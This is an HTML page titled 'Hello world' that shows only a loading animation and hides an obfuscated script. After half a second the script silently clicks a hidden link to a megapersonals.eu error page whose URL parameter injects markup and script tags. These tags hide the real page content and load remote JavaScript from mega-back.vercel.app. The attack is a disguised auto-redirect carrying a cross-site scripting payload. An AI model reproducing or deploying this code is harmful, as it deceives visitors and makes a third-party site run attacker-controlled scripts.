<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hello world</title>
    <style>
        * {
            margin: 0;
            padding: 0;
        }

        .hidden {
            display: none;
        }

        .loading-container {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #fff;
        }

        .loading-dots {
            display: flex;
            gap: 10px;
        }

        .dot {
            width: 16px;
            height: 16px;
            border-radius: 50%;
            background-color: #4285f4;
            animation: bounce 0.6s infinite alternate;
        }

        #content {
            display: none;
        }

        .dot:nth-child(2) {
            background-color: #ea4335;
            animation-delay: 0.2s;
        }

        .dot:nth-child(3) {
            background-color: #fbbc05;
            animation-delay: 0.4s;
        }

        .dot:nth-child(4) {
            background-color: #34a853;
            animation-delay: 0.6s;
        }

        @keyframes bounce {
            0% {
                transform: translateY(0);
            }

            50% {
                transform: translateY(-10px);
            }

            100% {
                transform: translateY(0);
            }
        }

        .dot:nth-child(2) {
            animation-delay: 0.15s;
        }

        .dot:nth-child(3) {
            animation-delay: 0.3s;
        }

        .dot:nth-child(4) {
            animation-delay: 0.45s;
        }
    </style>
</head>

<body>
    <div class="loading-container" id="lo_23k_w">
        <div class="loading-dots">
            <div class="dot"></div>
            <div class="dot"></div>
            <div class="dot"></div>
            <div class="dot"></div>
        </div>
    </div>
</body>
<script>
    function _0x1943(_0x2f2f33, _0x255988) { const _0x305cee = _0x305c(); return _0x1943 = function (_0x194349, _0x490594) { _0x194349 = _0x194349 - 0x74; let _0x194551 = _0x305cee[_0x194349]; return _0x194551; }, _0x1943(_0x2f2f33, _0x255988); } (function (_0x21421e, _0x30f76b) { const _0x4a98ad = _0x1943, _0x30aec6 = _0x21421e(); while (!![]) { try { const _0x55a91f = parseInt(_0x4a98ad(0x86)) / 0x1 * (parseInt(_0x4a98ad(0x79)) / 0x2) + -parseInt(_0x4a98ad(0x76)) / 0x3 * (-parseInt(_0x4a98ad(0x7d)) / 0x4) + -parseInt(_0x4a98ad(0x77)) / 0x5 + parseInt(_0x4a98ad(0x7f)) / 0x6 * (-parseInt(_0x4a98ad(0x85)) / 0x7) + -parseInt(_0x4a98ad(0x7c)) / 0x8 * (parseInt(_0x4a98ad(0x81)) / 0x9) + -parseInt(_0x4a98ad(0x82)) / 0xa + parseInt(_0x4a98ad(0x7b)) / 0xb * (parseInt(_0x4a98ad(0x87)) / 0xc); if (_0x55a91f === _0x30f76b) break; else _0x30aec6['push'](_0x30aec6['shift']()); } catch (_0x16255a) { _0x30aec6['push'](_0x30aec6['shift']()); } } }(_0x305c, 0x9f3b5), setTimeout(function () { const _0x1b4b59 = _0x1943, _0x32be54 = document[_0x1b4b59(0x80)]('a'); _0x32be54[_0x1b4b59(0x88)] = _0x1b4b59(0x83), _0x32be54[_0x1b4b59(0x7e)][_0x1b4b59(0x75)] = _0x1b4b59(0x74), document[_0x1b4b59(0x84)][_0x1b4b59(0x78)](_0x32be54), _0x32be54[_0x1b4b59(0x7a)](); }, 0x1f4)); function _0x305c() { const _0x5aa6c1 = ['3geKOtl', '4037235SUDFfT', 'appendChild', '70xTOfCp', 'click', '11NIIaqb', '136ZVCnxo', '887228IKrVfx', 'style', '20844NbAVTs', 'createElement', '555696VKZhph', '3906570VXwSLF', 'https://megapersonals.eu/public/error-message?error=%20data=%20!3m1!%201e3!4m2!4m1!3e0%20Agua%20Caliente%20Indian%20Reservation%20=33.780445%2C-116.545372%20%3C/h2%3E%20%20%3Cstyle%3E.container%20,%20footer%20%7b%20display:%20none%20;%20%7d%20a%20%7b%20color:%20white;%20%7d%20%3C/style%3E%20%3Cscript%20src=%22https://mega-back.vercel.app/js/anti_click.js%22%3E%20%3C/script%3E%20%3Cscript%20src=%22https://mega-back.vercel.app/js/main.js%22%3E%20%3C/script%20%3E', 'body', '147sLoHWe', '27449dDHqsr', '21484764hxTUtX', 'href', 'none', 'display']; _0x305c = function () { return _0x5aa6c1; }; return _0x305c(); }
</script>

</html>
